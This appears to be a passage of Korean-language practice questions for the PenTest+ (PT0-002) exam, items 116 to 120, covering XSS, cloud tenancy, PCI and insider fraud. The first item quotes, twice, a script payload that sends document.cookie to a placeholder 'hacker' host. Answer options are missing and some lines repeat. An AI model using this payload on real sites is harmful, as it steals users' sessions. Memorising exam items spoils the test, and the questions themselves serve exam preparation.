PT0-002 문제 116
다음 코드가 주어지면:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
다음 중 이러한 유형의 공격을 방지하는 가장 좋은 방법은 무엇입니까? (2개를 선택하세요.)
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
다음 중 이러한 유형의 공격을 방지하는 가장 좋은 방법은 무엇입니까? (2개를 선택하세요.)
PT0-002 문제 117
평가 중에 침투 테스터가 로그를 검사하여 단일 IP 주소에서 동일한 URL로 들어오는 수천 개의 요청을 발견했습니다. 몇 가지 요청이 아래에 나열되어 있습니다.
다음 취약점 중 공격자가 악용하려고 했던 취약점은 무엇입니까?
다음 취약점 중 공격자가 악용하려고 했던 취약점은 무엇입니까?
PT0-002 문제 118
한 회사는 클라우드 서비스 제공업체가 소프트웨어 개발을 수용하는 VM을 적절하게 보호하지 못하고 있다는 점을 우려하고 있습니다. VM은 물리적 리소스를 공유하는 다른 회사와 함께 데이터 센터에 보관됩니다. 다음 중 회사와 가장 관련이 있는 공격 유형은 무엇입니까?
PT0-002 문제 119
회사에 대한 내부 침투 테스트 중에 침투 테스터는 네트워크의 다른 부분으로 이동하여 주소, 전화번호, 신용카드 번호와 같은 고객 정보가 포함된 폴더를 찾을 수 있었습니다. PCI를 준수하려면 회사에서 이 데이터를 가장 잘 보호하기 위해 다음 중 무엇을 구현해야 합니까?
PT0-002 문제 120
침투 테스터는 최근 테스트에서 회계 부서의 직원이 결제 시스템을 변경하고 돈을 개인 은행 계좌로 리디렉션하고 있음을 발견했습니다. 침투 테스트는 즉시 중단됐다. 다음 중 향후 이러한 유형의 활동을 방지하기 위한 가장 좋은 권장 사항은 무엇입니까?